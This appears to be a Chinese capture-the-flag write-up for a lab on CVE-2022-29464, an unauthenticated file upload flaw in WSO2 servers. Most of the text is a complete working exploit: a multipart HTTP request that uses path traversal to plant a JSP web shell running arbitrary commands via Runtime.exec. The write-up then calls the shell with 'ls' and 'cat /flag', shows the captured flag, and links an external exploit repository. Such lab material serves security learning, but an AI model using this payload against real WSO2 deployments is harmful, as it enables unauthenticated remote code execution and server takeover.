春秋云镜 CVE-2022-29464 WSO2文件上传漏洞
靶标介绍:
WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。
启动场景
漏洞利用
poc
POST /fileupload/toolsAny HTTP/1.1
Host: localhost:9443
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 729
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0
--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"
<FORM>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>
--4ef9f369a86bfaadf5ec3177278d49c0--
构造如下请求包,返回1.6877661707702727E12为上传成功。
访问 https://eci-2ze665dz2c55qojfj419.cloudeci1.ichunqiu.com:9443/authenticationendpoint/1.jsp 即可执行命令
列出文件:https://eci-2ze665dz2c55qojfj419.cloudeci1.ichunqiu.com:9443/authenticationendpoint/1.jsp?cmd=ls
显示flag:https://eci-2ze665dz2c55qojfj419.cloudeci1.ichunqiu.com:9443/authenticationendpoint/1.jsp?cmd=cat+%2Fflag
得到flag
flag{ef1649bf-6a41-490e-9755-fd24e6cee750}
漏洞EXP
https://github.com/hakivvi/CVE-2022-29464
感兴趣的可以自己尝试下